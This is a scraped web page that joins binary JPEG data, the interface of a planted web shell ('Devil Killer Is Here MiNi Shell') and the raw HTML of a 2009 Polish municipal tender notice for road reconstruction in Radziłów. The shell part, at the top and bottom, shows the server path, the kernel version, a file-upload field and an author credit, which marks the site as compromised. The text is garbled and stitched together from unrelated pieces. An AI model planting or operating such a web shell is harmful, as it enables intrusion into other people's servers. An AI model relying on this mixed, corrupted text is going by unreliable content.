JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090530/84257-N-2009.html

<p class="kh_header"><b>Radziłów: Przebudowa dróg gminnych na terenie Gminy Radziłów dojazdowych do dróg powiatowych i wojewódzkich</b><br>
<b>Numer ogłoszenia: 84257 - 2009; data zamieszczenia: 30.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Radziłów , Plac 500-lecia 14, 19-213 Radziłów, woj. podlaskie, tel. 086 2737110, faks 086 2737111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaradzilow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych na terenie Gminy Radziłów dojazdowych do dróg powiatowych i wojewódzkich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w m. Rydzewo Pieniążek w km 0+000 ÷ 0 + 880
Skrócona charakterystyka techniczna:
Roboty przygotowawcze 
Odtworzenie trasy i punktów wysokościowych w terenie równinnym  - 0,88 km
Mechaniczne ścinanie krzaków wraz z karczowaniem pni o średnicy O 10cm - 16 szt
Mechaniczne ścinanie drzew o średnicy O 30cm - 3 szt
Mechaniczne usunięcie warstwy ziemi urodzajnej -70,4 cm 3
Rozebranie części przelotowej przepustów rurowych o średnicy O 60cm z uprzednim odkopaniem przepustów - 16 m
Odwodnienie korpusu drogowego 
Regulacja pionowa zaworów wodociągowych - 10 szt
Wykonanie części przelotowej przepustów O 60 cm z tworzyw sztucznych na ławie żwirowej wraz z wykonaniem wykopu i zasypaniem - 10 m
Wykonanie części przelotowej przepustów O 80 cm z tworzyw sztucznych na ławie żwirowej wraz z wykonaniem wykopu i zasypaniem - 11 m
Podbudowa
Wykonanie dolnej warstwy podbudowy z kruszywa naturalnego - 3059 m2
Wykonanie górnej warstwy podbudowy z kruszywa naturalnego - 5884,5 m2
Wyrównanie istniejącej podbudowy kruszywem naturalnym - 7,6 m3
Nawierzchnia
Wykonanie warstwy wiążąco -wyrównawczej z betonu asfaltowego - 4233 m2
Wykonanie warstwy ścieralnej z betonu asfaltowego - 4134 m2
Roboty wykończeniowe
Uzupełnienie poboczy pospółką z zagęszczeniem walcem - 156,1 m3
Oczyszczenie rowów z namułu z profilowaniem dna i skarp - 60 m
Brukowanie na podsypce z piasku skarp i dna rowu z kamienia łamanego - 16 m2
OZNAKOWANIE DRÓG
Ustawienie słupków z rur stalowych 
Przymocowanie do gotowych słupków znaków 

Przebudowa drogi gminnej w m. Mścichy w km. 0 + 000 ÷ 0 + 470 
Skrócona charakterystyka techniczna:
Roboty przygotowawcze 
Odtworzenie trasy i punktów wysokościowych w terenie równinnym  - 0,47 km
Mechaniczne ścinanie krzaków wraz z karczowaniem pni o średnicy O 10cm - 40 szt.
Mechaniczne usunięcie warstwy ziemi urodzajnej  - 16,5 m3
Rozebranie części przelotowej przepustów rurowych o średnicy O 60cm z uprzednim odkopaniem przepustów - 12 m
Roboty ziemne
Wykonanie nasypów mechanicznie z piasku - 56 m3
Odwodnienie korpusu drogowego
Wykonanie części przelotowej przepustów O 60 cm z tworzyw sztucznych na ławie żwirowej wraz z wykonaniem wykopu i zasypaniem - 9 m
Regulacja pionowa zaworów wodociągowych - 7 szt
Podbudowa
Wykonanie dolnej warstwy podbudowy z kruszywa naturalnego - 1856 m2
Wykonanie górnej  warstwy podbudowy z kruszywa naturalnego - 2193,6m2
Wyrównanie istniejącej podbudowy kruszywem naturalnym - 44,4 m3
Nawierzchnia
Wykonanie warstwy wiążąco wyrównawczej ścieralnej z betonu asfaltowego - 2295 m2
Wykonanie warstwy ścieralnej z betonu asfaltowego - 2246,6 m2
Roboty wykończeniowe
Uzupełnienie poboczy pospółką z zagęszczeniem walcem - 43,4 m3
Uzupełnienie nasypu pod projektowany chodnik - 22,6 m3
Oczyszczenie rowów z namułu z profilowaniem dna i skarp - 308m
Brukowanie na podsypce z piasku skarp i dna rowu z kamienia łamanego - 32 m2
Wykonanie przepustów pod zjazdami z tworzyw sztucznych o średnicy 40 cm - 35m
Urządzenia bezpieczeństwa ruchu 
Przestawienie słupa żelbetonowego linii napowietrznej niskiego napięcia - 1 szt.
Elementy ulic
Ustawienie krawężników betonowych 15x30cm na ławie betonowej z betonu B-10 - 164m
Ustawienie krawężników betonowych 25x12 cm na podsypce cementowo-piaskowej -23 m
Wjazdy do bram z kostki brukowej betonowej szarej o gr. 8 cm na podsypce cementowo-piaskowej - 34,5 m2
Ułożenie chodnika z kostki brukowej betonowej szarej o gr. 6 cm na podsypce cementowo-piaskowej - 197,4 m2
Ustawienie obrzeży betonowych 20x6 cm na podsypce piaskowej - 144m
OZNAKOWANIE DRÓG
Ustawienie słupków z rur stalowych 
Przymocowanie do gotowych słupków znaków 

Przebudowa drogi gminnej w m. Klimaszewnica w km. 0 + 000  ÷ 0 + 230
Skrócona charakterystyka techniczna:
Roboty przygotowawcze 
Odtworzenie trasy i punktów wysokościowych w terenie równinnym - 0,28 km
Mechaniczne usunięcie warstwy ziemi urodzajnej - 28 m3
Odwodnienie korpusu drogowego 
Regulacja pionowa studzienek kanalizacji sanitarnych - 4 szt.
Regulacja pionowa zaworów wodociągowych - 9 szt
Podbudowa
Wykonanie górnej warstwy podbudowy z kruszywa naturalnego - 1315,4 m2
Wyrównanie istniejącej podbudowy kruszywem naturalnym - 10,6 m3
Nawierzchnia
Wykonanie warstwy wiążąco -wyrównawczej z betonu asfaltowego - 43,2 m2
Wykonanie warstwy ścieralnej z betonu asfaltowego - 42,6 m2
Wykonanie nawierzchni z kostki brukowej betonowej szarej o gr 8 cm na podsypce cementowo-piaskowej - 1360,4 m2
Roboty wykończeniowe
Uzupełnienie poboczy pospółką z zagęszczeniem walcem -31,5 m3
Uzupełnienie nasypu pod projektowany chodnik - 32,9 m3
Urządzenia bezpieczeństwa ruchu 
Przestawienie słupa żelbetonowego linii napowietrznej niskiego napięcia - 1 szt
Elementy ulic
Ustawienie krawężników betonowych 15x30cm na ławie betonowej z betonu B-10 - 280 m
Ustawienie krawężników betonowych 25x12 cm na podsypce cementowo-piaskowej - 355 m
Wjazdy do bram z kostki brukowej betonowej szarej o gr. 8 cm na podsypce cementowo-piaskowej -80 m2
Ułożenie chodnika z kostki brukowej betonowej szarej o gr. 6 cm na podsypce cementowo-piaskowej - 292,4 m2
Ustawienie obrzeży betonowych 20x6 cm na podsypce piaskowej - 132 m
OZNAKOWANIE DRÓG
Ustawienie słupków z rur stalowych 
Przymocowanie do gotowych słupków znaków.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.32.22-1, 45.23.32.90-8, 45.23.32.52-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 17.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia moga sie ubiegać Wykonawcy którzy 
Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 oraz spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych po nowelizacji z dnia 13 kwietnia 2007 r. (tekst jedn. Dz. U. z  2006 r. Nr 164, poz. 1163 z późn. zmianami)
Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  tj
wykażą, iż w okresie ostatnich 5 pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeśli okres prowadzenia działalność jest krótszy- za ten okres, z należytą starannością wykonali siłami własnymi min. 3 trzy zadania których zakres rzeczowy obejmował wykonanie drogi o nawierzchni z betonu asfaltowego o gr. min 4 cm na odcinku 1 km  każde (poparte dokumentami potwierdzającymi, że roboty zostały wykonane należycie).
dysponują osobami zdolnymi do wykonania zamówienia, posiadającymi odpowiednie uprawnienia z branży budowlanej oraz są członkami właściwej Regionalnej Izby Samorządu Zawodowego pełniącą funkcję Kierownika budowy
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. wykażą, że posiadają środki finansowe na podstawowym rachunku bankowym lub zdolność kredytową w wysokości co najmniej 500 tys. zł. 
Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
Udzielą na wykonane roboty i wbudowane materiały  min. 36 miesięcznej gwarancji.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w rozdziale VII niniejszej SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż ww warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu oferta musi zawierać następujące dokumenty w formie oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę lub osobę upoważniona, z zachowaniem sposobu reprezentacji i oświadczenia w formie oryginału.
Oświadczenie, o spełnieniu warunków określonych zgodnie z art. 22 ust. 1 Ustawy Prawo Zamówieniach Publicznych oraz nie podleganiu wykluczeniu z art. 24 ust. 1, ust. 2 - /zał. nr 2/, wraz z zaświadczeniami:
a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej /wystawiony/e nie wcześniej niż 6 m - cy przed upływem terminu składania ofert/  - Załącznik Wykonawcy
b)aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego /wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert a potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, - Załącznik Wykonawcy
c)aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego /wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert/ potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, - Załącznik Wykonawcy
d)aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby, w za? kresie określonym w art. 24 ust. 1 pkt. 4 -8 ustawy, tj. w przypadku:
A/ osób posiadających polskie obywatelstwo - dokument z Krajowego Rejestru Karnego, 
B/ osób nie posiadających polskiego obywatelstwa - zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia określonej osoby ( zgodnie z art. 2 pkt. 9 Ustawy z dnia 13.06.2003r. o udzielaniu cudzoziemcom ochrony na terytorium RP - kraj po?chodzenia to państwo, którego obywatelem jest cudzoziemiec, a w przypadku cudzoziemca, którego obywatelstwa nie da się ustalić, lub który nie posiada obywatelstwa żadnego państwa - państwo, w którym stale zamieszkuje, /wystawione nie wcześniej, niż na 6 miesięcy przed upływem terminu składania ofert - Załącznik Wykonawcy
e)aktualną informację z Krajowego Rejestru Karnego, w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy (składają tylko podmioty zbiorowe w rozumieniu art. 2 ustawy z dnia 28 października 2002r.o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary), /wystawioną nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert - Załącznik Wykonawcy
UWAGA;
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypo?spolitej Polskiej, zamiast dokumentów, o których mowa w pkt. a), b), c), e), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie zgłoszono upadłości,
nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie spo?łeczne lub zdrowotne, albo, że uzyskał przewidziane prawem zwolnienie, od?roczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub
miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w powyższej UWADZE oraz w pkt.  d), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
wykażą, iż w okresie ostatnich 5 /pięciu/ lat przed dniem wszczęcia niniejszego postępowania, a jeśli okres prowadzenia działalność jest krótszy- za ten okres, z należytą starannością wykonali /siłami własnymi/ min. 3 /trzy/ zadania których zakres rzeczowy obejmował wykonanie drogi o nawierzchni z betonu asfaltowego o gr. min 4 cm na odcinku 1 km każde (poparte dokumentami potwierdzającymi, że roboty zostały wykonane należycie.- /zał. nr 3 /
Wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć
w wykonywaniu zamówienia, wskazanych w punkcie 6.3, b) niniejszej specyfikacji - /zał. nr 4/
Wykaz robót, które Wykonawca zamierza powierzyć wykonawcom /wypełniany w przypadku wykonywania robót przez Podwykonawców/ -  /zał. nr 5 /
Informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej /wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/, że Wykonawca posiada wymaganą wysokość środków finansowych lub zdolność kredytową /w treści winna być zawarta wysokość dostępnych środków/ - co najmniej 500 tys. zł - /zał.  Wykonawcy/
Aktualną polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, działalności zgodnej odpowiedzialność przedmiotem zamówienia /zał. Wykonawcy/.

Do oferty należy dołączyć dokumenty wymienione w punkcie XVII SIWZ.
UWAGA:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia w/w dokumenty, składa każdy z Wykonawców, dla udokumentowania spełnienia określonych warunków zamieszczonych w niniejszej SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminaradzilow.pl ,http://bip.ug.radzilow.wrotapodlasia.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Radziłów 
ul. Plac 500-lecia 14 
19-213 Radziłów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2009 godzina 09:30, miejsce: Urząd Gminy Radziłów 
ul. Plac 500-lecia 14 
19-213 Radziłów
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com